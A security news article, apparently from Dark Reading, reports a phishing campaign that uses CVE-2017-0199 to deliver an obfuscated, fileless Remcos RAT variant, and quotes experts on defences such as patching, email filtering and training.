Security
Headlines
HeadlinesLatestCVEs

Headline

Revamped Remcos RAT Deployed Against Microsoft Windows Users

Windows users are at risk for full device takeover by an emerging malicious version of the Remcos remote admin tool, which is being used in an ongoing campaign exploiting a known remote code execution (RCE) vulnerability in Microsoft Office and WordPad.

DARKReading
#vulnerability#windows#microsoft#java#rce

Source: imageBROKER.com GmbH & Co. KG via Alamy Stock Photo

Threat actors have given the commercially available Remcos remote access tool a new malicious makeover, wrapping its malware code in several layers of varying script languages, including JavaScript, VBScript, and PowerShell, to avoid detection and analysis and achieve full takeover of Microsoft Windows devices.

New findings from Fortinet researcher Xiaopeng Zhang warn Microsoft Windows users about a new campaign using this new-and-improved version of Remcos RAT that exploits a known remote code execution (RCE) vulnerability arising from how unpatched Microsoft Office and WordPad instances parse files.

The attack chain starts with a phishing email intended to lure users into clicking an Excel file disguised as a business order, according to the report. Once the file is activated it exploits the bug (CVE-2017-0199) and downloads the malware payload.

Remco’s New Version Is Good at Avoiding Analysis

“Its code is wrapped in multiple layers using different script languages and encoding methods, including JavaScript, VBScript, Base64-encoded, URL-encoded, and PowerShell, to protect itself from detection and analysis,” according to the researcher. “Once the downloaded exe file, dllhost.exe, starts, it extracts a batch of files into the %AppData% folder. Some of the key data are hidden in these files.”

From there, the host runs a piece of heavily obfuscated PowerShell code that, importantly, works only on the 32-bit PowerShell process, the report added.

Next, the malware runs self-decryption code hidden beneath a rat’s nest (pun intended) of unnecessary code to avoid analysis. But that isn’t the only sophisticated evasion technique utilized by the latest version of malicious Remcos RAT. According to the report, the campaign throws up several analysis road blocks throughout the attack chain, including installing a vectored exception handler, and gaining and calling system APIs in an inconsistent, hard to track way. It also uses a tool called "ZwSetInformationThread()" to check for a debugger, the report added.

“The malicious code calls API ZwSetInformationThread() with the argument ThreadHideFromDebugger (0x11) and the current thread (0xFFFFFFFE). This mechanism in Windows can conceal a thread’s existence from debuggers,” explained Zhang. “If a debugger is attached to the current process, it exits immediately once the API is called.”

The malware further uses an API hooking technique to avoid detection.

“The malicious code simulates executing multiple API instructions (say, two instructions) at the beginning and then jumps to the API to execute the rest of the instructions (beginning with the 3rd instruction),” according to the report. “Whenever any … detection conditions are triggered, the current process (PowerShell.exe) can become unresponsive, crash, or exit unexpectedly.”

Once ready, the threat actors download an encrypted file with the malicious version of Remcos RAT that is run in current process’s memory, effectively making this latest variant fileless, the report pointed out.

Defend With Patching, Training, and Endpoint Protection

“Remcos collects some basic information from the victim’s device,” Zhang added. “It then encrypts and sends the collected data to its C2 server to register that the victim’s device is online and ready to be controlled.”

Anti-analysis and tricky obfuscation techniques aside, Darren Guccione, CEO and founder of Keeper Security, noted in an emailed statement that low-tech phishing and social engineering that remain among the very most dangerous enterprise cybersecurity threats.

“Preventing these attacks requires a combination of technical defenses and employee awareness,” he wrote. “Recognizing red flags, such as unusual senders, urgent requests and suspicious attachments, can help reduce human error. Regular training and robust security measures empower employees to act as the first line of defense.”

Robust endpoint security should also be a priority to defend against these types of attacks, as well as a basic patch management strategy, according to a statement from Stephen Kowski, field CTO for SlashNext Email Security+.

“Protection requires a multi-faceted approach: keeping Microsoft Office fully patched, implementing advanced email security to detect and block malicious attachments in real time, and deploying modern endpoint security to identify suspicious PowerShell behaviors,” Kowski commented. “Most critically, since this attack relies on social engineering through phishing emails, organizations should ensure their employees receive regular security awareness training focused on identifying suspicious attachments and purchasing order-themed lures.”

Related news

Free Sniper Dz Phishing Tools Fuel 140,000+ Cyber Attacks Targeting User Credentials

More than 140,000 phishing websites have been found linked to a phishing-as-a-service (PhaaS) platform named Sniper Dz over the past year, indicating that it's being used by a large number of cybercriminals to conduct credential theft. "For prospective phishers, Sniper Dz offers an online admin panel with a catalog of phishing pages," Palo Alto Networks Unit 42 researchers Shehroze Farooqi,

Multi-Stage ValleyRAT Targets Chinese Users with Advanced Tactics

Chinese-speaking users are the target of an ongoing campaign that distributes malware known as ValleyRAT. "ValleyRAT is a multi-stage malware that utilizes diverse techniques to monitor and control its victims and deploy arbitrary plugins to cause further damage," Fortinet FortiGuard Labs researchers Eduardo Altares and Joie Salvio said. "Another noteworthy characteristic of this malware is its

India-Linked SideWinder Group Pivots to Hacking Maritime Targets

The nation-state espionage group known for attacking Pakistan has expanded its reach to targets in Egypt and Sri Lanka.

New SideWinder Cyber Attacks Target Maritime Facilities in Multiple Countries

The nation-state threat actor known as SideWinder has been attributed to a new cyber espionage campaign targeting ports and maritime facilities in the Indian Ocean and Mediterranean Sea. The BlackBerry Research and Intelligence Team, which discovered the activity, said targets of the spear-phishing campaign include countries like Pakistan, Egypt, Sri Lanka, Bangladesh, Myanmar, Nepal, and the

New Phishing Campaign Uses Stealthy JPGs to Drop Agent Tesla

Spanish speakers beware! A new campaign using the Agent Tesla RAT targets Spanish-speaking individuals. Learn how to protect…

North Korea's Kimsuky APT Keeps Growing, Despite Public Outing

Kim Jong Un's Swiss Army knife APT continues to spread its tendrils around the world, showing it's not intimidated by the researchers closing in.

Ransomware's Favorite Target: Critical Infrastructure and Its Industrial Control Systems

The health, manufacturing, and energy sectors are the most vulnerable to ransomware.

New Malware Campaign Targeting Job Seekers with Cobalt Strike Beacons

A social engineering campaign leveraging job-themed lures is weaponizing a years-old remote code execution flaw in Microsoft Office to deploy Cobalt Strike beacons on compromised hosts. "The payload discovered is a leaked version of a Cobalt Strike beacon," Cisco Talos researchers Chetan Raghuprasad and Vanja Svajcer said in a new analysis published Wednesday. "The beacon configuration contains

New campaign uses government, union-themed lures to deliver Cobalt Strike beacons

By Chetan Raghuprasad and Vanja Svajcer. Cisco Talos discovered a malicious campaign in August 2022 delivering Cobalt Strike beacons that could be used in later, follow-on attacks. Lure themes in the phishing documents in this campaign are related to the job details of a government organization in the United States and a trade union in New Zealand. The attack involves a multistage and modular infection chain with fileless, malicious scripts. Cisco Talos recently discovered a malicious campaign with a modularised attack technique to deliver Cobalt Strike beacons on infected endpoints. The initial vector of this attack is a phishing email with a malicious Microsoft Word document attachment containing an exploit that attempts to exploit the vulnerability CVE-2017-0199, a remote code execution issue in Microsoft Office. If a victim opens the maldoc, it downloads a malicious Word document template hosted on an attacker-controlled Bitbucket repository. Talos discovered two attack met...

Most Q2 Attacks Targeted Old Microsoft Vulnerabilities

The most heavily targeted flaw last quarter was a remote code execution vulnerability in Microsoft Office that was disclosed and patched four years ago.

DARKReading: Latest News

US Ban on TP-Link Routers More About Politics Than Exploitation Risk